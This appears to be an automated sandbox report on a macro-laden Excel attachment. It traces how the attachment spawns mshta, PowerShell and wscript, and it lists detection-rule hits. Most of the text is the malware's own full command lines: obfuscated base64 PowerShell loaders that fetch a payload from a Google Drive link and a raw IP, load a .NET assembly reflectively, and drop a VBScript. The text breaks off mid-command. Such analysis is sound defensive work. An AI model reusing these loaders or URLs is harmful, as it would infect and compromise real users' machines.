      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE88F204B85_2_000007FE88F204B8
      Source: A & C Metrology OC 5457144.xlsOLE indicator, VBA macros: true
      Source: A & C Metrology OC 5457144.xlsStream path 'MBD0026E5D6/\x1Ole' : https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingPgPo]RcYh6ze9_VNS+,vnXeoYkbU1jEboSE5JkrKyn157wixguzleFEArdkKcmIoWrmxUgyeXYtvZrCsnOn0Klj1Hxipqfv2KfCKhpGM3DDU0azxuzqG6B8r8Ao5i0QerwgM`EkU%R]2Cz
      Source: 54330000.0.drStream path 'MBD0026E5D6/\x1Ole' : https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingPgPo]RcYh6ze9_VNS+,vnXeoYkbU1jEboSE5JkrKyn157wixguzleFEArdkKcmIoWrmxUgyeXYtvZrCsnOn0Klj1Hxipqfv2KfCKhpGM3DDU0azxuzqG6B8r8Ao5i0QerwgM`EkU%R]2Cz
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2318
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2318
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2318Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2318
      Source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.expl.evad.winXLS@31/45@7/4
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\54330000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9387.tmpJump to behavior
      Source: A & C Metrology OC 5457144.xlsOLE indicator, Workbook stream: true
      Source: 54330000.0.drOLE indicator, Workbook stream: true
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P:.............0.................!.......................!.......!......................3........................!.............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(..............................}..w.............................1......(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P:.............................}..w.............................1......(.P..............3......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:........................l....}..w............\.......................(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............O.....q..l......O.....(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:........................l....}..w............\.......................(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............O.....q..l......O.....(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...O.....q..l......O.....(.P............................. .......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.I.c.E.C.R.e.d.E.n.t.i.a.L.d.e.P.l.O.y.m.e.N.t.(.P.............................8.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............O.....q..l......O.....(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............O.....q..l......O.....(.P.............................l.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w..............O.....q..l......O.....(.P.....................................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P:.............T.r.u.e.........}..w.............................1......(.P..............3......................@.p.............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(..............................}..w.............................1......(.P.....X.......t.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..*.....................................@.p.....}..w............8.......8.......@"......(.P.....X.......t.........*.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:.......................[k....}..w....@.p.....\.......................(.P.....X.......t.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1.......[k....pXb.....(.P.....X.......t...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:.......................[k....}..w....@.p.....\.......................(.P.....X.......t.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..*.....................................@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.........*.....T.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.p.....}..w............p`R.......[k....pXb.....(.P.....X.......t.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P:.............0........................................................................3......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(..............................}..w.............................1......(.P.....X...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P:.............................}..w.............................1......(.P..............3......................`...............
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:........................l....}..w....`.......\.......................(.P.....X...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............0 e........l......d.....(.P.....X...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:........................l....}..w....`.......\.......................(.P.....X...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............0 e........l......d.....(.P.....X...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0 e........l......d.....(.P.....X...............H....... .......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.I.c.E.C.R.e.d.E.n.t.i.a.L.d.e.P.l.O.y.m.e.N.t.(.P.....X...............H.......8.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....X...............H.......8.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............0 e........l......d.....(.P.....X...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........H.......F.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............0 e........l......d.....(.P.....X.......................l.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`.......}..w............0 e........l......d.....(.P.....X...............H...............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P:.............T.r.u.e.........}..w.............................1......(.P..............3......h...............p$..............
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(..............................}..w.............................1......(.P.............t.......h...............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p$......}..w............8.......8.......@"......(.P.............t.......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:.....................F..l....}..w....p$......\.......................(.P.............t.......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...(.P.............t...............6.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm:.....................F..l....}..w....p$......\.......................(.P.............t.......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1........l....._......(.P.............t...............$.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p$......}..w.............e.........l....._......(.P.............t.......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p$......}..w.............e.........l....._......(.P.............t.......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p$......}..w.............e.........l....._......(.P.............t.......................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p$......}..w.............e.........l....._......(.P.............t...............T.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......p$......}..w.............e.........l....._......(.P.............t.......................................
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: A & C Metrology OC 5457144.xlsReversingLabs: Detection: 18%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3